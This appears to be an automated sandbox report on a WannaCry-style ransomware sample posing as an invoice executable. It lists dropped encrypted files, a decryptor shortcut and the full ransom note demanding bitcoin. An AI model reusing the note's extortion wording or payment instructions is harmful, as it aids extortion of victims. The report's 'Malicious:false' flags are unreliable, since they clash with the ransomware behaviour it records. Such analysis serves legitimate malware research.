                                                          SHA-512:46980A02D2CD5591CC2F3B7F1E63D5FA225C44F9DA88B4C0F5D434339F35AA185F3785BFAB3D5A640A011EA5EBDFD039D85B000BFEBD53773189C4ECB5501016
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....&&.b.......4}...,}...R.W...P...Y.P=O..`.N.]..........f.yF.uOr.... ..^ ....QX...aKOD^/..=t..4....dM:..0.?.M.{....{.#?.D..4o..a..}....c....}..C.@....p.z..%...$,...cJU..BJU2...y.>n|;KA.}.....L.A1*.7..T..)........H...LbV...`......T.8..w.W;RGE.,............w.+..[o.(..7*i....n..nK........^......J....-...N.^"..._.X:}....j).=.F"N.x4\.."../p qP.i.k...z.q..y...iO..~?..aA....Z.t...U.mc.K.......5...k..$....]C..s......5.K...<.n-C...g.5..j.........7FI..D.C&...5..EL6.....C......oK..I.R...1F.....;...&U.-...D..>,..X...0|...O........lG..)...&eI.k(....B.j...1..!....m..rgc...B..X...... ...n\G.tv...YO.pucF..J...Y......G......v.B..u.nB..?.......D..'../.N......z.|.Q..F.......;O..y.J.Kw...r<?0*.q...V..Q...:`..P..)...O.!....j.%$:x..@)......l9K.C.^gF.8).YC.-..^(C.KcE.;.@....Wn....+......).......n-.:.w........x.&.M.E.`....X~q.6_...z.^..4.)\....+i[y.vA.....eF..)L.9.....p<}]=Zu..J.)......8b...vw..~;.P...4K........+...a.Q..!'h..W...g=5>C....7...U.:g.

                                                          C:\Users\user\Desktop\LIJDSFKJZG.docx

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.812830001482073
                                                          Encrypted:false
                                                          SSDEEP:24:lzNCEvn3naaqtZBX1C9yle4DBxE3UEjXJ0SghZW:lzNC6n3antZBG8DBxqUYSSMW
                                                          MD5:AA341E3728B2E710AD7F37ACEADC70FB
                                                          SHA1:A4A784F2BCD68568121547A3619E572DD57836BB
                                                          SHA-256:6F80D5CD465495967E3F3D3E8E5A02BE837550902CD214E79F6367DCE0C4895D
                                                          SHA-512:D8A5CBE26ACBF6A74AA54629AE4A037ADEAC279DAC5EB1D308E3E977B7B85638D107AE9774A37836F2EDA1F8FA2F0B67C18A635EF2058031EBA61B8FD19D19BA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:\C....X# .......~.1.....ZB.y;.|.&... .V.?.........3:...;.c.>.&...$Y.T.{....X.[...k..,.36....c...{y....8.G...ds.i....l.f....B.......B'.W.w....v.BG|.Rh..^z......*...`...^..?.aj.#.3...gi........bcZI..c#......sC..4......<:.<^i20....Y...z....o....... eK.*.J......m...w..e$....6...x....n\2........C...C..W...H$.C....4..Yz)Y.gk...3.,v.V.{z.7W.7....q.k ..;.~Ey..6`4..>s..yq...J..WA.S....jr..!l...O..<....q...9.fm.4s.5. +zNJ.?.6....h'ap.$....ar(G.H..j^...i>.t?.9..f..p.#~.[a.......+&~j4.....^?.......x...gBf.l.mU........8.......x@.....R..!O..b....:#..W..#.c.6..h..8...Q.E..y...Vv..=.|.}.D1Q...Jh.,JG...y...(..`......e.\...8./?:..+..[sa*..b...:D.O...qW..F.%..c.z|........0...Yc:.}.-....w...I...k.......s.q=...C.u.,]...Q.".!.Q....p.B....<.@..w7.}.....w.p.....^.}K..\..z.t.U.$..H...a}.n..9\.6.IPN..../I...g.X..f...pE.e.}Vcd..g..3.k...iI...{.m.G.[.<..+........?Qql..Ic.[....{.y..].0j...]..q.5..<.1....%g.z...... ....../l..h...0.=....yUg.......].../....E=.

                                                          C:\Users\user\Desktop\LIJDSFKJZG.docx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.85303185257776
                                                          Encrypted:false
                                                          SSDEEP:24:bkvgEfeB6AK/WpHew64F8tT18B2C0AaMXNgJEj/ZvqLavf4x+aJ:bkIEfehK/ltRW2lAV9pVvKhhJ
                                                          MD5:3A2A49DC26F18E1ABA8B756E9AE39687
                                                          SHA1:109D99C255A59D7C01336D2AEFEAA26CF61A9B78
                                                          SHA-256:5CDC93639D7BA39D69603B2BAD0A8947B2652B4DB1E195302E9EFB47A720DFC7
                                                          SHA-512:1A69EA758123E7BDB6C0DC86E4893168BE54FD9E376E5902C4B42F928C1117A829962733D3D39B1E4C72D82B13226F6E2197AA0801D0DF8570F80CDA4063B6EC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....h.....q..M..,..\..c...o.&......;..;ZY.....D...N.U..>....S..]....<;%.. ..e.6....l..<QOS.<..L...QQ..Z.C..O..nmJ~.....&j%..E..._...d..4.q....p" r..?.>..........%.Vy.L..c.?;.7..69......@.8a=....E..7.H.&V.X...cY.~.....z..i1>...~........)3lX..9"............5.......&5.@.(.!.#JH.RT~..C.l.. ....,.`9...z.~_..R..9e..M.$P ..kd,s.....R.f........'..*._.-{Q.....N..4...8.uc6.<..%.l.)+JQ..5..87..-t......v.&wwk<.....X,|.;_.n:..H..L.J....d5^..1.......^.<t.r..s.h.6..xA'.G.v..YN...<...^....D).g.. .#$|Xu]oJ~........Uo. .|.>...4.S;............f`.......`.p....@pO...~.4:LX@x/..\....m..@.+.].g.L...".]..3o=..Y....$.}{~..#..5.Y"...PI(.*...s..lI...P.....f......9..pg%..>z... .V{.7..,..'..o.;......".X.aw..y.........7}.'.<../...)t........-...p......jH......h.X.`RRyw.hC.....?j..S...PO.26.....hK.!*,>s..a.JB.nN...kGLU..j~.'.........LB.<qF.....$o...{.. E.....B.sD T...h.#...`..(...Q*....{;...~.50........%<....V..../.h.....c..O.,..l.dn>OO[....j.3.I. .H.`!

                                                          C:\Users\user\Desktop\LIJDSFKJZG.docx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.85303185257776
                                                          Encrypted:false
                                                          SSDEEP:24:bkvgEfeB6AK/WpHew64F8tT18B2C0AaMXNgJEj/ZvqLavf4x+aJ:bkIEfehK/ltRW2lAV9pVvKhhJ
                                                          MD5:3A2A49DC26F18E1ABA8B756E9AE39687
                                                          SHA1:109D99C255A59D7C01336D2AEFEAA26CF61A9B78
                                                          SHA-256:5CDC93639D7BA39D69603B2BAD0A8947B2652B4DB1E195302E9EFB47A720DFC7
                                                          SHA-512:1A69EA758123E7BDB6C0DC86E4893168BE54FD9E376E5902C4B42F928C1117A829962733D3D39B1E4C72D82B13226F6E2197AA0801D0DF8570F80CDA4063B6EC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....h.....q..M..,..\..c...o.&......;..;ZY.....D...N.U..>....S..]....<;%.. ..e.6....l..<QOS.<..L...QQ..Z.C..O..nmJ~.....&j%..E..._...d..4.q....p" r..?.>..........%.Vy.L..c.?;.7..69......@.8a=....E..7.H.&V.X...cY.~.....z..i1>...~........)3lX..9"............5.......&5.@.(.!.#JH.RT~..C.l.. ....,.`9...z.~_..R..9e..M.$P ..kd,s.....R.f........'..*._.-{Q.....N..4...8.uc6.<..%.l.)+JQ..5..87..-t......v.&wwk<.....X,|.;_.n:..H..L.J....d5^..1.......^.<t.r..s.h.6..xA'.G.v..YN...<...^....D).g.. .#$|Xu]oJ~........Uo. .|.>...4.S;............f`.......`.p....@pO...~.4:LX@x/..\....m..@.+.].g.L...".]..3o=..Y....$.}{~..#..5.Y"...PI(.*...s..lI...P.....f......9..pg%..>z... .V{.7..,..'..o.;......".X.aw..y.........7}.'.<../...)t........-...p......jH......h.X.`RRyw.hC.....?j..S...PO.26.....hK.!*,>s..a.JB.nN...kGLU..j~.'.........LB.<qF.....$o...{.. E.....B.sD T...h.#...`..(...Q*....{;...~.50........%<....V..../.h.....c..O.,..l.dn>OO[....j.3.I. .H.`!

                                                          C:\Users\user\Desktop\LIJDSFKJZG\@Please_Read_Me@.txt

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                          C:\Users\user\Desktop\LIJDSFKJZG\@WanaDecryptor@.exe.lnk

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 16 09:59:27 2024, mtime=Tue Jan 16 09:59:27 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                          Category:dropped
                                                          Size (bytes):575
                                                          Entropy (8bit):5.140087190146179
                                                          Encrypted:false
                                                          SSDEEP:12:8p9lRXpzYNbBmxCV9nRDTUobjAcIeooldJOdJAmV:8NYfJ/ZAcdDJYJAm
                                                          MD5:B260B5F1DA21A21030CF78AD377BA719
                                                          SHA1:AAF3ED1310E06DDA913464C27E844D68FB0B5E0D
                                                          SHA-256:14F95E9431CBBB8518EAA828AE01EDFE5E464C305DFB319E551AFDA47217E348
                                                          SHA-512:D9E2D44C383ADF16F20D2E704C4D2755F109E84D12E628B1C0A1C288BE5A8E8A0F69AA0A1A372932A240BFA001EB3EB0B82A8BDAE66E720F29E02C93281B6258
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.... ...V...kH..d?..kH...X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........{4...%g..kH...k..kH....t.2......J.. .@WANAD~1.EXE..X......0XnW0XnW....S.........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......X...............-.......W............/.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......927537...........hT..CrF.f4... ...0.+d...,....%..hT..CrF.f4... ...0.+d...,....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                          C:\Users\user\Desktop\LIJDSFKJZG\AQRFEVRTGL.pdf

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.819869068167296
                                                          Encrypted:false
                                                          SSDEEP:24:cTdUc4cSRMZYqg2L286JXSTwrzsD3wttRNHlXVkNd:cTdU/b2L286jMktPNHlXVkj
                                                          MD5:8E79C756E83271D1035B5B44D69DBC15
                                                          SHA1:F92BE20EFC2DB0D62F83C8AB9A96B285B5EC5A59
                                                          SHA-256:D9CFC761CC944FC19F5DB50B12A968338A07EA0F1248AA2C0DEFCAFBA82EA6FF
                                                          SHA-512:26C3E3E7F7285EA61DDF51D5BFBB7D36098980CD9FB7CA91BBF60AC1B580A3B914E7E7B9A739D9AD4B3C2E80B654DA48DD23E4FE22F0C2D38D4281D40BDAC5A8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...r..I..-..3+.....9..o..X..X~....;....).&.........lPd..O.f.^j..w.-.C..T.65\.s.1..!..#......D..c...>...J.v....4..3....k....8K... ....N........H.^K.......dye..L.a.U=..8F....C.....y..*.3\....gS....+.86...e........Y.Q.M,.K....6.O.D...W.F(.z....G.%-!yn..._6.!G....N8............e.&.....m..1T.8._....oK.....{......h...N;.3c/.p..M^..8.lV.D...."hg..Z..s..H..s....C[.@Sp_Pr.;!.H.a..nw.Vr.q.-...6.5..Y......Q...y|P.W..R..;[.B5D...]|.^R...Y.I..O2.).*......q...,|.t.co..U!;=.Z.>.0T..............d....7M..x..!.b..3;..H..E....!...`..[...1.L.:...a..\...6.%..VD...{.uJ...R...q...E...Q.....EH.t.../{.......&...M..N...l.{.'=.v....)..-.*...y..|[0..... ..+#....?:..B&.;.g>...1...!@.cFcJ.pbR..3?:c...$...?>..;q:C..Z.E`S$p..Cm2..?..zo...(.|..E.d.]....c.:.y...&..4..]vV..Q?..>Hbz..K.......zh..DEQ.6....y.......1$..2K/.d..l.%..........X...nY.....yu...,.}.@.+...K.....7..v.....:$-....@....fK..f.e..Zi5..ea...^..ZNyq.\h.N+.g.V.N<.7*.._0.r..#S....\....L....$..4xp.|..2.

                                                          C:\Users\user\Desktop\LIJDSFKJZG\AQRFEVRTGL.pdf.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8269715905666555
                                                          Encrypted:false
                                                          SSDEEP:24:bkV7x940oTRSRDfYV5/3YAo2j58jcpn30WUFn7pxhw3XbBtLg35YArWzRGybkN:bkV7xu0MUfYzoTDjMnEVhCX3Lg9rWzRM
                                                          MD5:4B5C5F5B01DAFE916625F7D6317618CB
                                                          SHA1:A6D8F7CF1A4C120D6B0230A2ECB859FED2C57641
                                                          SHA-256:6FEC65CD4B21C086CDF4C6D275A35A0DCAC667E889CD405516AE8C3950AA75DE
                                                          SHA-512:E37696D8C644BC5642FE5D4FDA5DAD9E58CDE97456B39FCA09A81B70CB3C03C6C7D16F432565DDBC14EA1D13CAC0F2DA2D0635A7A3221A7166970318F7D1B88F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......H...L.....@uf?-.N..7......,.e..|F&....U{..g..,5..pPl[.m.D..L.(>9=&L,.R4..IA..$.u.7..,|0..N..e..2...j......9.y(9;'....Y/+:....s@x.. .;..t....".cja...,s..2.X..UEi........',.Z9[..H;......|u.V.0.....gF.^..^.Ra....{z%:E...U....B..q....v.....-..3..............e..O./...>O.%..wx#%..B3.e..T..DJ..,.a...w.....b.x.....|...HNk..C.H.D.s...$A..u.i._.U.. ..15#bcM...>"..........y....N}.............`...;W.C..Y?..s.'.5DG..kS.....f=[.......N,z...N.....(.>.F!...................y.h)...~.#w.8.R..U.L.....b...".<n."..g.j..}0..UN&v...a]........1...`......?..n=5.2.x..J1./...AS9.._.U!L.R..p..r..b...o....,f..P.n@g.\T.V.8......x/..c`..2.=.p..........1...Bj..'"v.Ke..,....G\.h.....h.g.9>3'........{q......i..U.......q......r......3A.....(.8....O.._.A.R...A..[....P...n'.....r.....g.K.f'..0#..'H..'.c.....U".s...W.Y.9..y.....&.....usD.?@.,.|4......^......K....1...k..1..N.`@.!_..(.d..D..SA.bd. <....hy.8l..W,.....oo.|..%9.......i..r.Q.v.,...8a.5.[X.

                                                          C:\Users\user\Desktop\LIJDSFKJZG\AQRFEVRTGL.pdf.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8269715905666555
                                                          Encrypted:false
                                                          SSDEEP:24:bkV7x940oTRSRDfYV5/3YAo2j58jcpn30WUFn7pxhw3XbBtLg35YArWzRGybkN:bkV7xu0MUfYzoTDjMnEVhCX3Lg9rWzRM
                                                          MD5:4B5C5F5B01DAFE916625F7D6317618CB
                                                          SHA1:A6D8F7CF1A4C120D6B0230A2ECB859FED2C57641
                                                          SHA-256:6FEC65CD4B21C086CDF4C6D275A35A0DCAC667E889CD405516AE8C3950AA75DE
                                                          SHA-512:E37696D8C644BC5642FE5D4FDA5DAD9E58CDE97456B39FCA09A81B70CB3C03C6C7D16F432565DDBC14EA1D13CAC0F2DA2D0635A7A3221A7166970318F7D1B88F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......H...L.....@uf?-.N..7......,.e..|F&....U{..g..,5..pPl[.m.D..L.(>9=&L,.R4..IA..$.u.7..,|0..N..e..2...j......9.y(9;'....Y/+:....s@x.. .;..t....".cja...,s..2.X..UEi........',.Z9[..H;......|u.V.0.....gF.^..^.Ra....{z%:E...U....B..q....v.....-..3..............e..O./...>O.%..wx#%..B3.e..T..DJ..,.a...w.....b.x.....|...HNk..C.H.D.s...$A..u.i._.U.. ..15#bcM...>"..........y....N}.............`...;W.C..Y?..s.'.5DG..kS.....f=[.......N,z...N.....(.>.F!...................y.h)...~.#w.8.R..U.L.....b...".<n."..g.j..}0..UN&v...a]........1...`......?..n=5.2.x..J1./...AS9.._.U!L.R..p..r..b...o....,f..P.n@g.\T.V.8......x/..c`..2.=.p..........1...Bj..'"v.Ke..,....G\.h.....h.g.9>3'........{q......i..U.......q......r......3A.....(.8....O.._.A.R...A..[....P...n'.....r.....g.K.f'..0#..'H..'.c.....U".s...W.Y.9..y.....&.....usD.?@.,.|4......^......K....1...k..1..N.`@.!_..(.d..D..SA.bd. <....hy.8l..W,.....oo.|..%9.......i..r.Q.v.,...8a.5.[X.

                                                          C:\Users\user\Desktop\LIJDSFKJZG\HMPPSXQPQV.xlsx

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.79742894563415
                                                          Encrypted:false
                                                          SSDEEP:24:D7/raSfcNXaW7KKC+7XLzxMcGTRDgvtdpNuE0gyP:D7jR+XanKbzx8RDgFvT/c
                                                          MD5:E9975251F6A35CFA326D586A3ABC8723
                                                          SHA1:4FD84337EE6B15DD48F6B8ECEDB4F3E906BA6DC8
                                                          SHA-256:8B4DEB46C659E5DD2485A2A2A65810FB72FDB303677AD9980D560609700BF274
                                                          SHA-512:470162D1E875F45F99A1A0BABEA28B6211ED47488C54693E6E7D5A8A4B0A092ECC66159ADAD731037A00B1BDC00F453E481DA735601CCC5F18CC2C7D7E30936B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.E...........=.........5Vo.u.0..W#..$.w.7$fJ.Z..*O.[j..J.%....c.#...&..r...L.n.fU.....^E'.~ahGE....D .h..U... .a.6FYG.!v:..}..A0Os.&x.....nb..o.M.A.0)...s|AK.5X>>.\......j.0.s.o.L.N..8..l..D.......C..<A8N..#.tt.....D....f..b.=9...lh>...,.wk.._O.......x.V"4&..$M\.....i...w...$.t...d._..y].5.B.{....k....X.....oI..Kg]+..N4..........MY.2....;R...."...!..&o.,..es!......Eu.....9...4...+>.).*JL...i..-6.vS.............M..Z.....~..'...HY.....C....d..s.K.....]..?.....p..^..&.......2.........E]p.H6.O......gky.!.].@.......H.w..+.M..M...i.U.).........l6Ve.G2"+.Z.....Z...9w^.P)..{!.!G....5.w...z...(.m.ap:.......E..m.g^.6#~.E>......I...t.._.YUE...I........N...8....E...N$j..,m.Y'.g.%$o...+Vsr..Kj....]..7.ak*..]3i0d5.Gn%.BY..?RZ.MPux..,.>.B.f..k.ld.../.Gi.0..........k...{.?....^..&X5..1.Y..n23T.]G...,.6X...-o.(i6.I.uJ..J..z(....qJ..%..4./......=.......H..8+A....|.Z+.I.&...?..2.IE.w.N..\..|m<.d.zv....0..N...v*.H..+o..9u..`?.D'........U...-.G.j.*.EE.

                                                          C:\Users\user\Desktop\LIJDSFKJZG\HMPPSXQPQV.xlsx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.848816869635776
                                                          Encrypted:false
                                                          SSDEEP:24:bkzbtRCOiGgvHLBOu1pwKrbqr4jcnTb5woy85F9xzLIchsOhaEPe:bkzJhgNRbqr4jcnTbNXJSO1Pe
                                                          MD5:C5A72C6A751E24673AF066BD8DCF7E9C
                                                          SHA1:02098449E177B901C1B1A87C6C82A19F23E01583
                                                          SHA-256:BE9B8B753362B3A5DB5EA4C078C1EA9F3FFD313A30B5793C7ADAD751B5208D84
                                                          SHA-512:2BC175AAFD46B26AB5A0E62BC947BDB7CD0FAD93601D82157709DE41272EFB61A01FD2ED831C5EA6C1E4EDAA00C5555E7BD3E5619B771C7FEA1016EEEA3A8CE0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....X4 K8.;.X b........A=..@..O.wN.R..E..W...z..6}.u*. ..9?.... ..._..m.C...rK.w.:.......Q..&n......7Y.$S.l..C.............U.80..M...Qm....C.u.U.Y...<....t..Vj.s.h...h9.9J...n.@G.....6.vs`..n..4..5a..7.=.1BR..4..}..er..M.*h.;.......q.'B<GFOwv.K....&.............yN-...}.?...J..)*.c.../.L..N.=T4l6r..H..N....................U...9.v...w_. Z..m@........U........|.y/....~ai..9G4q..T=.8.....uH.P....c........o(..Ph9I..U*...F6.=+.|...$.y7.........F. ....}.1DUl.V@H/....X..D.k\....#..X.Q........;...\...L...X@.Q.}3jA...H......<...LZ.DB.P.Nq....]..d?.s.._.s...v...3..B......`E.....w..y(.E..P.\o.x..:.........@.Sj.v..s..j...5.h....f@o...P(/..pR(K...p.(W..n....Qi..Sz...)....0.E{.'.........2.;@.>t...Hej..|..Vd.....v...BH.....5!.q..L-..v.../..U....e..rJ|.4.5..{..)h...U..'$.N.6..k..x.)s=g&..d.(.Nh...|%...P....2.k\d...ll^....]!.tN.9.V....|....,.7....@...S....gp..4.E...yF];...r(....:..|O.^yFI`Eb.....l}.._.r3..e.4jU.{.Bx.......a=...(7z}Br.t...A.W8..z.O.I....

                                                          C:\Users\user\Desktop\LIJDSFKJZG\HMPPSXQPQV.xlsx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.848816869635776
                                                          Encrypted:false
                                                          SSDEEP:24:bkzbtRCOiGgvHLBOu1pwKrbqr4jcnTb5woy85F9xzLIchsOhaEPe:bkzJhgNRbqr4jcnTbNXJSO1Pe
                                                          MD5:C5A72C6A751E24673AF066BD8DCF7E9C
                                                          SHA1:02098449E177B901C1B1A87C6C82A19F23E01583
                                                          SHA-256:BE9B8B753362B3A5DB5EA4C078C1EA9F3FFD313A30B5793C7ADAD751B5208D84
                                                          SHA-512:2BC175AAFD46B26AB5A0E62BC947BDB7CD0FAD93601D82157709DE41272EFB61A01FD2ED831C5EA6C1E4EDAA00C5555E7BD3E5619B771C7FEA1016EEEA3A8CE0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....X4 K8.;.X b........A=..@..O.wN.R..E..W...z..6}.u*. ..9?.... ..._..m.C...rK.w.:.......Q..&n......7Y.$S.l..C.............U.80..M...Qm....C.u.U.Y...<....t..Vj.s.h...h9.9J...n.@G.....6.vs`..n..4..5a..7.=.1BR..4..}..er..M.*h.;.......q.'B<GFOwv.K....&.............yN-...}.?...J..)*.c.../.L..N.=T4l6r..H..N....................U...9.v...w_. Z..m@........U........|.y/....~ai..9G4q..T=.8.....uH.P....c........o(..Ph9I..U*...F6.=+.|...$.y7.........F. ....}.1DUl.V@H/....X..D.k\....#..X.Q........;...\...L...X@.Q.}3jA...H......<...LZ.DB.P.Nq....]..d?.s.._.s...v...3..B......`E.....w..y(.E..P.\o.x..:.........@.Sj.v..s..j...5.h....f@o...P(/..pR(K...p.(W..n....Qi..Sz...)....0.E{.'.........2.;@.>t...Hej..|..Vd.....v...BH.....5!.q..L-..v.../..U....e..rJ|.4.5..{..)h...U..'$.N.6..k..x.)s=g&..d.(.Nh...|%...P....2.k\d...ll^....]!.tN.9.V....|....,.7....@...S....gp..4.E...yF];...r(....:..|O.^yFI`Eb.....l}.._.r3..e.4jU.{.Bx.......a=...(7z}Br.t...A.W8..z.O.I....

                                                          C:\Users\user\Desktop\LIJDSFKJZG\LIJDSFKJZG.docx

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.828129222117002
                                                          Encrypted:false
                                                          SSDEEP:24:PaTqBUY+nmh4MALM0MWLRodNqNWM4ywdNU4yyzRVvUbapkqN:SgFh4MAVp+ncWMxcNfysXN
                                                          MD5:054E23C1349999421768276E230B1AA1
                                                          SHA1:A21C992FA3B04B6A3F864B1FCB10B875D2C216F6
                                                          SHA-256:0FCC4BC9102175D067051D2F2A8837FB29F3BF4D79C828D46D9BA1D067C83756
                                                          SHA-512:4E602E6A37CF40DB2B5D1FE408B6FA46020E528B8088388F8ECC540C35614426C8715A14D5060AAD8868945409BD25EB7F29EC93470DC99155EC22C437C229BB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:G@...4.u.....-.;.'".....tX...,).p........?&........]4....xB..m.{0.[...w.7{........(........)..>....<w}....V.h......;.s0p...........@.<"{.\=B.5...t.'T.]G{.......s/.v......D.......WvK..0....:..w....k...U..=....0.]rU....0|......f....F .E@....[....#M.t.:.F84...X...bNq...!x....\..#.3.m.-...A"w..w~im....-.......E.s...\|D.;...6L....9F..X.S.]C..E...F......n......a.j).....g,..U.L.a.r..i..".....Gf..p8F&..^..f.g....A.y../W.B.;..j../..%............i...nn...4...>..c.L.y............Y:.:Z.`gE...(..h=..^?TH.9pO....}...0F,.9.5sd..7~.D.A..ac..j._.gg...`...I....g.?..ltZ........c!....;.|....6J.x.p..\.qZ.6.....(<..j...a.R..?.)QD.|m..%p..0...'....].K.l.a..9.X.X..u.I..f..^... `.1=....5.|....u.5.Z..`.b.*az.q./.p.s.M;..<...M..8...:.... ..e.G...A...;.M.>.?|_..P.[]Ri.Bp+B.G(....Ku0...X...]I..!g...1.%..U.....J......=d...?..whs..r....M.B-.g!.[..G.n$}.X."..8{z.H...*.+...._.......[HL..v..~../N,'...mV....."..* T.R.R6.wD.....tkZ..R....w\./.;..J_lN.e..6....

                                                          C:\Users\user\Desktop\LIJDSFKJZG\LIJDSFKJZG.docx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.844868078231559
                                                          Encrypted:false
                                                          SSDEEP:24:bkMMzlVxsr0+TJr5rJZWFG/TzvOTQkOIA4IT6wt5RzoO3cSlzFp1hqTUNW:bkHxDszTJr0DTZZIT6ehDp87
                                                          MD5:53F4D0846D513B6529FC9138FB359B23
                                                          SHA1:8058880E6DFB7A8BFFE3B3637E5D882A92FF3EB6
                                                          SHA-256:77CBA7BDE7D34A5B4F2D9C70464C843B0611A9855AD8FF0FEE17FF42272E046A
                                                          SHA-512:75EF50B2E457CE698A48606DF2F9391C2CDB8442D1B37D82E0E3763AAE8F3E3569D80EE84491BDCB485AA808F40023BC01FAB380D8A90F03630F91177A546136
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....0...K..n!'M..3...:..}.>..g.#..K..`.h.fLc..RKe9......F.9<.@.@......-Yg8o.@.urQ.tg....&....KP"_.H|G..(..._.".Q5...E..d}.o4.4p...Y...1.U.#.......OS...jo|t.....Eo...EeC...I.#.R.I._.M.9^...........<..-k...s_LDD.".mK5..;".5.w.....+,.:...WDqy7..j&. (z............<.z.....!5.......]._....=Y.XLV-i.J.`..o...!.5R9..... .... '.n._ .Ry|e0.k.jQ..i.,....n.g.A#.T...H1U.L..FKC..Jgy...'.p..e*.F.9rg.E.!...i......u...o..(|.....v}..T23e..6O....2......n.fD.d.....1...4D.,*k..]..;..c.x ..[<.....|.M .7J....S3.......s....,..FN~...!Z..,q.(...k....-.."..p.......oNT8-$...A(Qi.....h..A...;....zg..F.s...a....Sn..T...<...|...u..j..g .>....<.......l...h....C..\2~.Y..q^.X..q......K&.val..CB.T1..~....`.8..c...;....._0....p.S.........L(.. .s.._Q.0f.?.....Jh...x....Q4.C..$....O&Z..<V.t..sr_......1...i.........S....n[.....Z..x@....#...q,...P..%9.&.'.g.nP....O..<...;..:......6BbM~....jN.?..f;.J.8.... ..pA....yr.".d.Q.....,[....l..BO........h.c....#..4nLJ.i..(.........9.

                                                          C:\Users\user\Desktop\LIJDSFKJZG\LIJDSFKJZG.docx.WNCRYT

                                                          Download File
